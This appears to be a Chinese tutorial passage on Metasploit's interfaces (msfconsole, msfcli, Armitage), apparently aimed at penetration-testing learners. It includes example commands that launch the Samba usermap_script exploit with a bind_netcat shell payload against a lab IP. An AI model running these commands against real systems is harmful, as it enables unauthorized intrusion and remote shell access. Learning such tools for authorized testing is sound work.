Metasploit用户接口(MSF终端、MSF命令行、Armitage)

2.2Metasploit用户接口

         Metasploit软件为它基础功能提供了多个用户接口，包括终端、命令行、图像化界面等。除了这些接口，功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。

2.2.1 MSF终端

         MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口，而且MSF终端是Metasploit框架中最灵活、功能最丰富以及支持最好的工具之一。MSF终端提供了一站式的接口，能访问Metasploit框架中几乎每一个选项和配置。可以使用MSF终端做任何事情，包括发起一次渗透攻击、装载辅助模块、实施查点、创建监听器，或是对整个网络进行自动化渗透攻击。

l  启动MSF终端

在window下启动MSF终端的方法，点击如左下图红色框，启动成功的右图如下：

访问MSF终端的帮助文件，只要输入help，就会给出使用命令列表，给出一部分截图：

还可以在help后面加上metasploit命令，如help connect：

connect命令可以允许与一台主机进行通信。显示的结果文档会列出使用方法、对该命令的描述，以及各种不同的配置选项。

2.2.2 MSF命令行

         MSF命令行和MSF终端为Metasploit框架访问提供两种不同途径，MSF终端以一种用户友好的模式来提供交互方式，用于访问软件所有的功能特性，而msfcli则主要考虑脚本处理和其他命令行工具的互操作性。最新版本：msfcli被整合进msfconsole的参数里。

例如：

老指令：      

msfcli multi/samba/usermap_scriptPAYLOAD=cmd/unix/bind_netcat    RHOST=192.168.200.129E

新指令：       

msfconsole -x "use exploit/multi/samba/usermap_script; set RHOST   192.168.200.129; set PAYLOAD cmd/unix/bind_netcat;[set LHOST IP;] run"

2.2.3 Armitage

         Metasploit框架中的armitage组件是一个完全交互式的图形化用户接口。具体的安装可以从网上下，这里只介绍msf方式。